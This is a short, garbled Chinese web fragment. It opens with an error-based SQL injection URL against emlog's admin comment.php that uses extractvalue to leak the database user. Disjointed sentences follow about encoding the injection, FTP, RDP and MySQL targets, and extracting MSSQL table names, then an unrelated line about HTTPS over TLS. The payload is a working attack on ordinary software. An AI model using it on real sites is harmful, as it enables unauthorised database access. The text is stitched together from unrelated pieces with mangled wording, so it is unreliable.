/emlog/admin/comment.php?action=delbyip&token=abac6e12c2abe9b29797b64481ef6ed4&ip=127.0.0.1′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# 注入时得进行编码处理才干成功，当然各位师傅的骚操作比我多。 一个FTP，两个3389，一个Mysql。 抛开其他不谈，这次只看FTP。 为了得到表格称号,咱们能够运用上述办法获取表格称号中的每个字符。 咱们仅有要做的便是更改查询以检索当时数据库的表格称号。 由于Mssql不会进行指令约束,因而,查询有些杂乱。 do

HTTPS 是在传输层安全（TLS）衔接上运用 HTTP 协议。